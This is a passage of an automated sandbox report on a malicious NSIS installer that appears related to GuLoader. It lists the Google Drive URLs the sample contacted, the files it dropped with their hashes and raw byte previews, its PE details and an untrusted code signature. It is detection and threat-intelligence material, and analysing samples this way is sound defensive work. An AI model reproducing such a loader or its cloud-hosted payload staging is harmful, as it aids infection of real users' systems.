                		high
                https://apis.google.comQNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A61000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1628142286.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2037793311.0000000003A7A000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://nsis.sf.net/NSIS_ErrorErrorQNuQ5e175D.exefalse
                    		high
                    https://drive.google.com/iQNuQ5e175D.exe, 00000003.00000003.1642418562.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1642477593.0000000003A81000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://translate.google.com/translate_a/element.jsQNuQ5e175D.exe, 00000003.00000003.2434684472.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2116216201.0000000003A78000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1780080786.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2071438083.0000000003AB9000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1937717326.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1803358057.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1757374960.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000002.2562113835.0000000003AC1000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1617239451.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1779990575.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2027261178.0000000003AB9000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1592877929.0000000003A82000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1970929884.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2037793311.0000000003AB9000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1960034459.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2445603809.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2104101611.0000000003AB9000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1948458745.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892630990.0000000003A61000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1604917776.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1757332882.0000000003A79000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://drive.google.com/QNuQ5e175D.exe, 00000003.00000003.1745863415.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1881033712.0000000003A82000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1925981246.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A43000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1937805348.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1948379458.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1791818626.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892630990.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1847687586.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1903523473.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1825678658.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2138998807.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1813958035.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1617206388.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1642477593.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2468233736.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892606488.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1858349107.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1690308078.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1993229355.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1847731615.0000000003A81000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://drive.google.com/ube.QNuQ5e175D.exe, 00000003.00000003.1937805348.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1712715094.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1723334448.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1937717326.0000000003A79000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://drive.google.com/ertificatesQNuQ5e175D.exe, 00000003.00000003.1745863415.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A43000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1791818626.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892630990.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1780110033.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1768535254.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1757399705.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1881137157.0000000003A57000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://drive.google.com/NrQNuQ5e175D.exe, 00000003.00000003.2457226025.0000000003A79000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://drive.google.com/rQNuQ5e175D.exe, 00000003.00000003.2127459901.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1881033712.0000000003A82000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1925981246.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1937805348.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1948379458.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1847687586.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1903523473.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2138998807.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892606488.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1847731615.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2071438083.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2093555969.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1870054618.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892558538.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1915071176.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2082212148.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2104101611.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1925952115.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2116216201.0000000003A78000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1937717326.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1870002480.0000000003A79000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  142.250.184.225
                                  		drive.usercontent.google.comUnited States
                                  		15169GOOGLEUSfalse
                                  172.217.16.142
                                  		drive.google.comUnited States
                                  		15169GOOGLEUSfalse

                                  General Information

                                  Joe Sandbox version:42.0.0 Malachite
                                  Analysis ID:1588755
                                  Start date and time:2025-01-11 05:04:35 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 6m 22s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:8
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:QNuQ5e175D.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:e5fd95536576d21b43b1552aed3040ea366375b5a952c333dd89f1ed251c12aa.exe
                                  Detection:MAL
                                  Classification:mal68.troj.evad.winEXE@3/5@2/2
                                  EGA Information:
                                  • Successful, ratio: 50%
                                  HCA Information:
                                  • Successful, ratio: 84%
                                  • Number of executed functions: 52
                                  • Number of non-executed functions: 64
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                  • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target QNuQ5e175D.exe, PID 7988 because there are no executed function
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  23:06:01API Interceptor43x Sleep call for process: QNuQ5e175D.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  No context

                                  Domains

                                  No context

                                  ASNs

                                  No context

                                  JA3 Fingerprints

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  37f463bf4616ecd445d4a1937da06e19iwEnYIOol8.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                  • 142.250.184.225
                                  • 172.217.16.142
                                  Ntwph4urc1.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                  • 142.250.184.225
                                  • 172.217.16.142
                                  2976587-987347589.07.exeGet hashmaliciousNitol, XmrigBrowse
                                  • 142.250.184.225
                                  • 172.217.16.142
                                  2976587-987347589.08.exeGet hashmaliciousNitolBrowse
                                  • 142.250.184.225
                                  • 172.217.16.142
                                  Ntwph4urc1.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                  • 142.250.184.225
                                  • 172.217.16.142
                                  2976587-987347589.08.exeGet hashmaliciousUnknownBrowse
                                  • 142.250.184.225
                                  • 172.217.16.142
                                  yMXFgPOdf2.exeGet hashmaliciousGuLoaderBrowse
                                  • 142.250.184.225
                                  • 172.217.16.142
                                  2976587-987347589.07.exeGet hashmaliciousUnknownBrowse
                                  • 142.250.184.225
                                  • 172.217.16.142
                                  yMXFgPOdf2.exeGet hashmaliciousGuLoaderBrowse
                                  • 142.250.184.225
                                  • 172.217.16.142
                                  02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                  • 142.250.184.225
                                  • 172.217.16.142

                                  Dropped Files

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dllZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                    letsVPN.exeGet hashmaliciousUnknownBrowse
                                      letsVPN.exeGet hashmaliciousUnknownBrowse
                                        Revo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                          Revo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                            Documenti di spedizione.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                              Order NO 000293988494948595850000595995000.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                  FiddlerSetup.5.0.20245.10105-latest.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                    HHn9tNeZd8.exeGet hashmaliciousGuLoaderBrowse

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll

                                                      Download File
                                                      Process:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):12288
                                                      Entropy (8bit):5.804946284177748
                                                      Encrypted:false
                                                      SSDEEP:192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
                                                      MD5:192639861E3DC2DC5C08BB8F8C7260D5
                                                      SHA1:58D30E460609E22FA0098BC27D928B689EF9AF78
                                                      SHA-256:23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
                                                      SHA-512:6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                                      Joe Sandbox View:
                                                      • Filename: ZoRLXzC5qF.exe, Detection: malicious, Browse
                                                      • Filename: letsVPN.exe, Detection: malicious, Browse
                                                      • Filename: letsVPN.exe, Detection: malicious, Browse
                                                      • Filename: Revo.Uninstaller.Pro.v5.3.4.exe, Detection: malicious, Browse
                                                      • Filename: Revo.Uninstaller.Pro.v5.3.4.exe, Detection: malicious, Browse
                                                      • Filename: Documenti di spedizione.bat.exe, Detection: malicious, Browse
                                                      • Filename: Order NO 000293988494948595850000595995000.exe, Detection: malicious, Browse
                                                      • Filename: kelscrit.exe, Detection: malicious, Browse
                                                      • Filename: FiddlerSetup.5.0.20245.10105-latest.exe, Detection: malicious, Browse
                                                      • Filename: HHn9tNeZd8.exe, Detection: malicious, Browse
                                                      Reputation:moderate, very likely benign file
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....C.f...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres\Assureringer69.udv

                                                      Download File
                                                      Process:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      File Type:Matlab v4 mat-file (little endian) X, numeric, rows 0, columns 0
                                                      Category:dropped
                                                      Size (bytes):376884
                                                      Entropy (8bit):1.2538694993882065
                                                      Encrypted:false
                                                      SSDEEP:1536:eTJcpruMcjYX8Jf2lBD7XWqllCEYyZB0mFS04:eJcpPIYX8JonFS3
                                                      MD5:943DE1999A45C6772E1F2FB9E1803546
                                                      SHA1:542FC5B588D85BB0E7FCEED47789836A9C428984
                                                      SHA-256:1CCAB41F428AAB780F43CA2C25EB80A63755BD7977DFF975ED662FDB9672D515
                                                      SHA-512:A6AC5B8C7A1DBC2F06888E0F9285A6E1BD39A6C35E021BB5E3DC179E1EA176BEDDC7AD8C49CAEDDD7E10E232F980C7186E05DB890E001BA481E24E9D7EE4C434
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:..................0.X.........(.................;..........P...................S..........................................................................................m.......................................................................................................................n..........+.........v...................J...............'...........................................................i.......6........!.E................a...........................'....u....L......W...............................................................................................J................................................................~.................,..........................................n.................. .....................................................................................................................P......a.......T.......................................................................................................................................

                                                      C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres\Nonpatentability.Cou

                                                      Download File
                                                      Process:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):222843
                                                      Entropy (8bit):7.362565451544298
                                                      Encrypted:false
                                                      SSDEEP:6144:gZ4ZblE1Ev2ugYpg+POgIPWJHbZeowW7H42LK:gZ4ZMEviYpgEHJHbwtKH422
                                                      MD5:20E1BC5AD88D5F2BE5A58EFC3EA1457B
                                                      SHA1:1099DBD1065F6958A014552FD0DF5D26CFF1CFB7
                                                      SHA-256:1FC0AA24E14AC6EA316ED1E1293D9F4B9B19047BCD5BAC97B35E2DB1AEDD7246
                                                      SHA-512:F97570AFF8D400CB300E05A4C57A8EA3D016FA9DC2675CAF89BFAB8B6465A2A021AA201B9E2CBD0472136207B4F92E20775EAF81BB0C926549FE7DD452B260D7
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.............................................==..........G...0.I...............S.......MM.............ww...\..........x................7..>..................aa.\\...........%%%..^.....e.......VVVV...........................................MMM..PP.YY.{.z..x.....-...rr.....................................MMM.......VV...[.111.................................................+.........................%%........WW...eeee..................................................k........................................zz.{.........\.....[......::........jjj.........ZZZZZ..j.`...............D.....:..nnnn..........bb.q.................MM...........ee.|.......T...{....;.........)............11.....$$$.......hhh.DD.....r.RRRR.""............... ....EEEE...pp......................................................--......................VV......_.................///...CCC.1.........8.;;;............................f...yy..... ...........q..............KK.....................i....y...00..@@.Z..o.........

                                                      C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres\Sunbreak.Pat

                                                      Download File
                                                      Process:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):37114
                                                      Entropy (8bit):4.648205422140126
                                                      Encrypted:false
                                                      SSDEEP:384:z0GZqpL6AJbzyEyPpyOFYqjG3YL3BM6doOGNblZ9bQZkCC90fFjrBv26dUayacAM:IGKzaZFYqC3500310fhdKtz
                                                      MD5:A2C20BC4DA366C09E9FD86704A33CB0C
                                                      SHA1:91A57F0DDBE7C4E7556BA38BB2CFC8C8C5B52CEC
                                                      SHA-256:2BF4E12311D437A5B61F085C80ED3B3A8C29E77674DAC41F4829E4251C3878A1
                                                      SHA-512:27ADF3C40D1B3583D4104DB2E5A221F0963A25DB7C593426556493EC536C24F2B7866A8B7DF69F8E4127DAE78510B4FC7CAF65660EE2F25EE791C3480E38532B
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:..V...............Z....MM..........vv.::.....,.|||. ....................................F.....Kk.....c....-.............bb........F..............t....|.. ............>....T............e...P..@@@.Y...f....oo.........``...................h.HH....%%.........V.........Q...TTT..r............PP..........OO.:....vvvvvvvvvv.:........MM....mm.....QQQQQ...................n.....EE....C.....h...............|...........r..#...xx.ttt............p...U.......o....0.e.........rrr.......m...........`.]]]..................KK.....E...................`.......l........... .......f...dd..... ....O..KK......[[[.666666..=. .......n..'.AAAAA........3............4444....DD...o........AA.....}}}}...TTT...........yy.z...~.11................2....Q..nnnnnnn.......~....................L.."..............JJ.G.......//.9..............:................................... ......hhhh............................ww............:.....WW..(......................::.c....3...q..............i...............O.............C..66

                                                      C:\Users\user\AppData\Local\skattekode\Rygtets222\overstadigeres\serow.kar

                                                      Download File
                                                      Process:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):437967
                                                      Entropy (8bit):1.2496824675371185
                                                      Encrypted:false
                                                      SSDEEP:768:YszAIbEHsrUdiWwGdV5C+P4/1F93McF1TWcY7hYu4nR/CFxofOrNYSOq5HGieGwO:YJkFhJAhX55ckvF4ULrV2Ehr3gra5
                                                      MD5:0695A340DE7C3F5F45036C9C9EAFDBD2
                                                      SHA1:D741BBBBFAD62B1D85E87CEDD3F344F4062C33D6
                                                      SHA-256:0020F3470C29CAC49F8521309D6DA437EC6F71B2F5BD41A7B5DD88788B5AC25F
                                                      SHA-512:D2668C1016BBE3DF9CE638D834AA13CC1100D4B85FCB4AC7396DA8166B50F0B2AF0A9025BA35D54A865EC87F356EEEB7A577B000B9B50F8ECC996B3E798CF145
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:....Z...................................,.............O............2............................N...........J................................................................M..v..H...........................E.......K............................S..........T.......=............#.............................-...............................8.................................'......................0.................................t....................................0....................6..................|.......................................................;...............=................................K..............................................................................W..........{....................`............................................................................|...................................................................w....T................S............................y...........x......................J.......................................1......

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Entropy (8bit):7.407220190167989
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:QNuQ5e175D.exe
                                                      File size:585'064 bytes
                                                      MD5:9bb2cdb8508ee2255a35ecec43462a48
                                                      SHA1:c7465e8b0a3ae61b23520752afbb8bf89a3cecdd
                                                      SHA256:e5fd95536576d21b43b1552aed3040ea366375b5a952c333dd89f1ed251c12aa
                                                      SHA512:0b8e8399eb04372c1cb70467dca25078ab255d01c448fa7ccabd620d9066306a1127c4e5caa4af66226662bb3b2d143045b9212332e7408c7b97ea40672a0ac1
                                                      SSDEEP:12288:ifYfUlNHYh6EEfqUhn5i5mfQAsS+6ePZxIgLF7eEbH+aj:ifYMPYcqUhY5mp9+6ehxIg5H9j
                                                      TLSH:E0C4F0257614AC5AC4EC10358BDDDE7B07630F6A7B6C521F73C4BE4C7AB9A816922323
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................j.........

                                                      File Icon

                                                      Icon Hash:016c4c4ebe99dd65

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x403552
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x660843FB [Sat Mar 30 16:55:23 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f4639a0b3116c2cfc71144b88a929cfd

                                                      Authenticode Signature

                                                      Signature Valid:false
                                                      Signature Issuer:CN=nonconverging, O=nonconverging, L=Cliff, C=US
                                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                      Error Number:-2146762487
                                                      Not Before, Not After
                                                      • 18/03/2024 08:00:38 18/03/2027 08:00:38
                                                      Subject Chain
                                                      • CN=nonconverging, O=nonconverging, L=Cliff, C=US
                                                      Version:3
                                                      Thumbprint MD5:B0E922076FFE2DF5FE70C6AC8CD556A2
                                                      Thumbprint SHA-1:CE784EA178F07EE5869E76F3117DD8B531152C79
                                                      Thumbprint SHA-256:B8488CDBED36172DB2D61C9AB8ED59564E9285624F8AE446AA90892EF78FB1EC
                                                      Serial:5A5D66BB316E150417CDF6D37A5D77AE424A4754

                                                      Entrypoint Preview

                                                      Instruction
                                                      sub esp, 000003F8h
                                                      push ebp
                                                      push esi
                                                      push edi
                                                      push 00000020h
                                                      pop edi
                                                      xor ebp, ebp
                                                      push 00008001h
                                                      mov dword ptr [esp+20h], ebp
                                                      mov dword ptr [esp+18h], 0040A2D8h
                                                      mov dword ptr [esp+14h], ebp
                                                      call dword ptr [004080A4h]
                                                      mov esi, dword ptr [004080A8h]
                                                      lea eax, dword ptr [esp+34h]
                                                      push eax
                                                      mov dword ptr [esp+4Ch], ebp
                                                      mov dword ptr [esp+0000014Ch], ebp
                                                      mov dword ptr [esp+00000150h], ebp
                                                      mov dword ptr [esp+38h], 0000011Ch
                                                      call esi
                                                      test eax, eax
                                                      jne 00007F74F0BCEC4Ah
                                                      lea eax, dword ptr [esp+34h]
                                                      mov dword ptr [esp+34h], 00000114h
                                                      push eax
                                                      call esi
                                                      mov ax, word ptr [esp+48h]
                                                      mov ecx, dword ptr [esp+62h]
                                                      sub ax, 00000053h
                                                      add ecx, FFFFFFD0h
                                                      neg ax
                                                      sbb eax, eax
                                                      mov byte ptr [esp+0000014Eh], 00000004h
                                                      not eax
                                                      and eax, ecx
                                                      mov word ptr [esp+00000148h], ax
                                                      cmp dword ptr [esp+38h], 0Ah
                                                      jnc 00007F74F0BCEC18h
                                                      and word ptr [esp+42h], 0000h
                                                      mov eax, dword ptr [esp+40h]
                                                      movzx ecx, byte ptr [esp+3Ch]
                                                      mov dword ptr [004347B8h], eax
                                                      xor eax, eax
                                                      mov ah, byte ptr [esp+38h]
                                                      movzx eax, ax
                                                      or eax, ecx
                                                      xor ecx, ecx
                                                      mov ch, byte ptr [esp+00000148h]
                                                      movzx ecx, cx
                                                      shl eax, 10h
                                                      or eax, ecx
                                                      movzx ecx, byte ptr [esp+0000004Eh]

                                                      Rich Headers

                                                      Programming Language:
                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x86080xa0.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x680000x2ac78.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x8e4600x908.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x68f80x6a00595406ea4e71ef6f8675a1bd30bcc8f9False0.6703272405660378data6.482222402519068IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x80000x14640x1600a995b118b38426885fc6ccaa984c8b7aFalse0.4314630681818182data4.969091535632612IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
